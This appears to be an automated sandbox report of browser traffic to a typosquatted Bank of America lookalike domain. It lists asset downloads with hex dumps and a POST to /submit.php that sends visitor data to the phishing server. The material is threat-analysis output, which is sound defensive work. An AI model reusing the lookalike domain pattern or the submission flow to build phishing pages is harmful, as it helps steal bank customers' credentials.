                                                                                              2025-01-15 18:42:02 UTC16384INData Raw: 4c 30 47 f4 ec 5f eb 47 43 cc 8c a2 df 02 80 b5 88 19 c7 5c a5 c1 1a 4e c2 2a f2 58 92 26 15 d1 69 c4 fd 85 b9 7e d8 8d 59 3a 1c da 41 a4 98 7a 8b 7b 2b bd c5 7d a5 86 02 bc bf 7d 31 a3 b6 c6 54 0a 4f d8 b3 72 fd 45 49 0c a8 83 7a c5 70 32 d7 9a eb 4f de d4 fc 74 4c 9c be 07 b9 6f 1d 6c 08 28 d9 78 fa 6e 4c 39 6d d2 e1 58 98 e1 8a 26 0e ef cb a1 f9 a7 70 83 66 8f 20 6e ca e8 7d 5e 44 a6 11 ad 73 8a 9d 92 24 76 ca 01 3b de b0 d4 20 26 b2 54 ad 12 05 b4 34 51 b4 14 58 07 fa d3 0b d0 fc c8 05 fd 52 40 03 7c 88 a0 fe 5a 4b 29 bc 59 6d c3 1b 2b ca b5 a0 65 9a e1 83 ea 5c ba a9 4b ca e9 a6 2e 2f 39 3b 8f 9c 12 bd 18 41 ca 68 c3 63 2c fc ec 4f 6a 2a fd 69 78 e9 4b da 1c 63 22 68 d8 d2 68 39 75 af 6c d6 b4 1a 07 36 c2 61 ee 35 9d 15 8e f0 0e 3d 55 38 03 28 61 50
                                                                                              Data Ascii: L0G_GC\N*X&i~Y:Az{+}}1TOrEIzp2OtLol(xnL9mX&pf n}^Ds$v; &T4QXR@|ZK)Ym+e\K./9;Ahc,Oj*ixKc"hh9ul6a5=U8(aP
                                                                                              2025-01-15 18:42:02 UTC16384INData Raw: 95 95 e7 c3 2b ab 90 8f a5 28 68 e2 a3 c5 28 1b 09 9b 6c c4 93 a8 9c a3 5d f8 0e 08 c9 72 60 65 5c 19 8d 66 40 ce 70 88 5a f4 90 5a 5c f8 14 59 ab 92 b2 8a 60 26 1b af 63 3f fb 59 5f 7a 2d 03 47 93 1b 38 e9 96 f1 51 7d f8 cc 14 c2 cc 4a e6 64 8b 85 2a 58 21 36 43 a9 6d 22 b0 42 26 1b ee e0 02 a8 9a 22 38 b1 85 16 21 e7 32 05 aa 7a 07 eb c5 45 3b 7c 83 be fa d2 27 85 6d 17 7d fd 62 e9 75 86 a1 0b a2 17 ce ac 7f f0 06 e9 33 7e c3 2f 5f 88 5d 79 f5 05 b1 f4 b3 cc f3 25 6d 57 cf ba eb 5e 58 67 17 7a a6 52 f4 4c 16 2a 2c cb d9 a4 dc 03 5a 58 a8 72 db 99 e4 0e 05 2d b8 cf 09 8e 74 ef 44 a2 7a 10 b7 57 4b e3 16 85 2e fa 46 e9 36 f6 b9 b4 57 47 2f 90 f6 98 98 13 9b 99 5e a6 74 e3 36 ab e4 aa 4b bf 6a bc 47 3d 13 a7 05 cc e7 a1 99 7b dd 19 a6 13 f5 39 b9 79 39 19
                                                                                              Data Ascii: +(h(l]r`e\f@pZZ\Y`&c?Y_z-G8Q}Jd*X!6Cm"B&"8!2zE;|'m}bu3~/_]y%mW^XgzRL*,ZXr-tDzWK.F6WG/^t6KjG={9y9
                                                                                              2025-01-15 18:42:02 UTC16384INData Raw: a5 bd 78 ca dc a2 82 fa 74 d7 62 34 53 6d 32 c4 0a 6a bd 42 cf 96 57 e7 54 d6 e0 f5 04 fb e4 28 5e 4f f1 8c 8b 59 c7 04 d4 d1 d5 12 e7 09 27 45 34 10 ad 33 21 2d 5e e1 04 3a f4 04 c2 2f 16 b0 78 89 12 22 c5 9e 4c 84 94 cf 21 f4 aa f5 5c 1c 29 99 8d c0 71 c5 91 5a ef 24 03 94 38 3a 85 a0 52 6a a2 19 dc 0c 04 99 ab 8c f3 47 c5 50 8e 58 3c f2 fc 93 7b e6 77 55 25 bd 10 da bc d2 b1 68 81 67 4a 6e aa 5e 76 cb d6 f6 c7 77 d7 ce 9e d1 c2 cb 7f 32 6b 36 2f bb ed 81 d2 b6 1d b3 2e fe 19 2f 26 67 41 75 71 92 a7 6b f7 94 19 45 2c 69 1a 21 75 8e ac 83 3d 20 7b 8b 60 3b 01 70 15 0f 15 ec a4 87 4a d0 62 ef 8c 89 c2 3a 81 6a a5 08 f4 d8 83 0c 6b 68 72 9c 20 3b 99 08 14 0b 3e 1c 03 46 17 e2 24 d6 4f 33 4d 1d 4b c8 ed 0a a1 7e 77 67 eb e8 e9 59 71 f2 dd 99 15 d3 37 e2 bb
                                                                                              Data Ascii: xtb4Sm2jBWT(^OY'E43!-^:/x"L!\)qZ$8:RjGPX<{wU%hgJn^vw2k6/./&gAuqkE,i!u= {`;pJb:jkhr ;>F$O3MK~wgYq7
                                                                                              2025-01-15 18:42:02 UTC2552INData Raw: 52 ec 8d 7d b1 0f ee c0 85 d8 1f fb e1 00 1c 88 af f0 0d ee 64 2d 43 0c 33 c2 3a d6 e3 0f fc c9 06 36 b2 89 cd f8 8b e0 18 8e e5 38 92 e3 b9 1c 97 e7 0a 5c 91 2b 71 65 ae c2 55 b9 1a 57 e7 1a f8 19 bf 70 4d ae c5 b5 b9 0e d7 e5 7a 5c 9f 1b 70 43 6e c4 8d b9 09 37 e5 66 dc 9c 5b e0 57 bc ca 2d 39 81 5b b1 85 51 c6 18 67 82 ad 6c 63 3b 93 ec e0 d6 dc 06 1f e0 43 6e cb ed b8 3d 77 e0 8e ec e4 44 76 71 12 bb 39 99 3d 9c c2 5e 4e c5 0d b8 91 d3 38 9d 33 38 93 7d 9c c5 9d 38 9b 73 d8 8f df f0 3b 3e c2 c7 1c e0 ce 9c cb 79 9c cf 05 dc 85 bb 72 37 ee ce 3d b8 27 0d 0e 32 c5 21 9a 1c 66 9a 19 5a 5c 88 bb b8 88 59 e6 98 c7 27 f8 14 97 d1 e6 08 f7 62 81 45 3a 2c 71 31 47 b9 04 af e1 7d bc 89 b7 f0 36 de c3 eb 78 97 4b b9 8c 7b 73 1f ee cb fd b8 3f 0f e0 81 3c 88 07
                                                                                              Data Ascii: R}d-C3:68\+qeUWpMz\pCn7f[W-9[Qglc;Cn=wDvq9=^N838}8s;>yr7='2!fZ\Y'bE:,q1G}6xK{s?<


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              38192.168.2.1659110188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:02 UTC560OUTGET /assets/BofA_rgb.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:02 UTC251INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:02 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:02:46 GMT
                                                                                              ETag: "99fe-6118032cc4d80"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 39422
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:03 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 f0 00 00 00 aa 08 06 00 00 00 e2 17 6e 41 00 00 00 09 70 48 59 73 00 00 17 12 00 00 17 12 01 67 9f d2 52 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                                                                              Data Ascii: PNGIHDRnApHYsgROiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K
                                                                                              2025-01-15 18:42:03 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii:
                                                                                              2025-01-15 18:42:03 UTC6654INData Raw: 31 a2 8d 76 bd 87 9f 82 1e ca 67 67 66 02 87 e1 a7 c0 e5 99 a8 be 40 14 b3 81 43 81 19 1e db 3c 08 3f ab 66 ca c9 44 cf 2f 75 2b 06 b0 cf 9d f0 9b ea 67 94 4e a3 5c db 8f e8 83 f9 d3 3d bc 54 fb 18 d0 ef e5 5e 4a f2 ec b1 94 5f 66 ee 75 2f b1 22 e5 ec 33 e0 0c 60 15 ac 1e d7 5d 58 70 51 e2 e3 7b 55 cf ea ea d2 26 d9 10 ab cb 15 d5 d0 0c 3c 2b 74 73 fb 23 e5 eb 55 60 3d e0 5a 92 09 a6 3f 04 74 c7 06 74 b3 6e 4b 2c 06 17 6a fc ec 25 77 6c ff ae fb 6e bc 9a a7 f0 99 bb 02 1f 34 f1 6f da bb 8b 6f 57 2c c0 ed 33 9d 42 7f ac 42 f6 fd 19 38 1e ab 01 9b 79 68 c7 47 0a 9c 11 44 9f ed dd 1b cb dd fe b3 2e 35 de 04 ae c6 f2 a6 47 d1 1a b8 11 5b dd d0 a0 6e 2d c9 07 c0 c5 c0 df 3c b6 79 23 56 f0 51 b3 a6 7f ff 22 ed 6b f6 c0 7a 01 ec ef 7a 31 f4 9f e4 97 8f c1 fc 7f
                                                                                              Data Ascii: 1vggf@C<?fD/u+gN\=T^J_fu/"3`]XpQ{U&<+ts#U`=Z?ttnK,j%wln4ooW,3BB8yhGD.5G[n-<y#VQ"kzz1


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              39192.168.2.1659111188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:02 UTC566OUTGET /assets/sign-in-sprite.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:02 UTC249INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:02 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:25:52 GMT
                                                                                              ETag: "c2f-611808568fc00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 3119
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:02 UTC3119INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 09 00 00 00 87 08 06 00 00 00 c4 2b 73 b8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                                                                              Data Ascii: PNGIHDR+spHYsOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              40192.168.2.1659112188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:02 UTC569OUTGET /assets/help-qm-fsd-hover.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:03 UTC248INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:02 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:30:38 GMT
                                                                                              ETag: "1fc-611809674ff80"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 508
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:03 UTC508INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0a eb 00 00 0a eb 01 82 8b 0d 5a 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 36 e8 bc b2 8c 00 00 01 76 49 44 41 54 38 8d a5 93 3d 4f c2 50 14 86 9f 1a 23 43 13 61 21 8e 20 6e 4e 38 3a 01 03 26 18 13 f0 1f b0 e9 60 d2 ea 6e c4 b8 9b 32 3a 89 8b 8b 83 25 31 6d a2 24 96 89 d1 86 01 27 3e 4c 98 c4 81 c4 30 30 5d 07 28 5e 4a 89 83 67 bb e7 3d e7 39 1f f7 5e 45 08 c1 7f 6c 15 40 51 94 60 35 67 a4 01 b0 75 47 76 cb 45 15 21 c4 3c 60 92 a4 03 79 1f ae 0a 18 d8 ba b3 1c 90 33 0c 40 fb a3 eb b2 b0 34 7d 11 90 33 4a c0 85 27 14 76
                                                                                              Data Ascii: PNGIHDRasBIT|dpHYsZtEXtSoftwareAdobe Fireworks CS6vIDAT8=OP#Ca! nN8:&`n2:%1m$'>L00](^Jg=9^El@Q`5guGvE!<`y3@4}3J'v


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              41192.168.2.1659113188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:02 UTC567OUTGET /assets/gfoot-home-icon.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:03 UTC247INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:03 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:27:46 GMT
                                                                                              ETag: "90-611808c347c80"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 144
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:03 UTC144INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 09 08 06 00 00 00 02 4d 1d 69 00 00 00 57 49 44 41 54 28 53 ad 8e c1 09 c0 30 0c 03 b5 b7 e7 4a f7 f2 04 29 32 b8 18 55 79 14 fa 38 62 12 9d 23 64 e6 56 22 62 03 28 38 eb 3b 81 13 78 5e 6b 15 f3 ee 25 ce 1f 74 f3 13 94 06 38 6d 74 cc ac 15 39 4f ac d8 35 66 a0 6b 69 fd 16 2b f3 ab 78 c2 8a 5f a0 73 03 6f a4 50 c0 d7 52 a5 d3 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                              Data Ascii: PNGIHDRMiWIDAT(S0J)2Uy8b#dV"b(8;x^k%t8mt9O5fki+x_soPRIENDB`


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              42192.168.2.1659114188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:03 UTC850OUTGET /assets/favicon.ico HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:03 UTC264INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:03 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 13:35:38 GMT
                                                                                              ETag: "47e-6117fd1c2fe80"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 1150
                                                                                              Connection: close
                                                                                              Content-Type: image/vnd.microsoft.icon
                                                                                              2025-01-15 18:42:03 UTC1150INData Raw: 00 00 01 00 01 00 10 10 00 00 01 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 d7 0d 00 00 d7 0d 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff
                                                                                              Data Ascii: h(


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              43192.168.2.1659116188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:04 UTC559OUTGET /assets/favicon.ico HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:04 UTC264INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:04 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 13:35:38 GMT
                                                                                              ETag: "47e-6117fd1c2fe80"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 1150
                                                                                              Connection: close
                                                                                              Content-Type: image/vnd.microsoft.icon
                                                                                              2025-01-15 18:42:04 UTC1150INData Raw: 00 00 01 00 01 00 10 10 00 00 01 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 d7 0d 00 00 d7 0d 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff
                                                                                              Data Ascii: h(


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              44192.168.2.1659117188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:10 UTC907OUTPOST /submit.php HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 1773
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Origin: https://online.access.secure.bankofamerlica.com
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:10 UTC1773OUTData Raw: 6a 73 6f 6e 3d 7b 22 75 69 64 22 3a 22 35 61 34 64 32 32 65 32 62 32 62 62 64 38 65 65 65 63 64 31 65 35 62 36 62 30 31 32 64 39 38 37 22 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 75 61 67 65 6e 74 22 3a 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 31 31 37 2e 30 2e 30 2e 30 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 22 2c 22 68 6f 73 74 22 3a 22 6f 6e 6c 69 6e 65 2e 61 63 63 65 73 73 2e 73 65 63 75 72 65 2e 62 61 6e 6b 6f 66 61 6d 65 72 6c 69 63 61 2e 63 6f 6d 22 2c 22 73 74 70 22 3a 22 30 22 2c 22 63 73 72 66 54
                                                                                              Data Ascii: json={"uid":"5a4d22e2b2bbd8eeecd1e5b6b012d987","ip":"8.46.123.189","uagent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36","host":"online.access.secure.bankofamerlica.com","stp":"0","csrfT
                                                                                              2025-01-15 18:42:12 UTC276INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:10 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Content-Length: 2
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              2025-01-15 18:42:12 UTC2INData Raw: 6f 6b
                                                                                              Data Ascii: ok


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
